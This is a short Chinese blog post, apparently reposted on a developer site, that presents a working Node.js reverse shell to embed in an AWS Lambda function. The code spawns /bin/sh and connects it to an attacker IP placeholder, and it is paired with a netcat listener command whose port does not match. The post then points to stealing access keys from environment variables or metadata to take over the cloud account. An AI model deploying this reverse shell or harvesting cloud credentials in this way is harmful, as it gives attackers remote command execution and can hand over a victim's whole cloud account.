js获取ip_AWS Lambda Node.js 反弹shell

df4ac62775612a25f490005b605c2d26.png

PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。

0x00 前言

原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。

0x01 被攻击端

直接套到lambda函数里就行了

(function(){
    var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "此处替换为攻击端IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

0x02 攻击端

nc -lvnp 8820

4009b7e027077bb3ce59f97e68db8385.png

0x03 后记

这就就是云服务接管比直接的服务器被控的危害更大,就是可以在环境变量或者元数据中拿AKSK,然后权限配置不当的话,可以直接控了整个云账号了。

0x04 参考链接

  • 你和目标只差一个shell的距离
  • AWS LambdaのOSがAmazon Linux 2に変わっていたから中身を覗いてみた
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值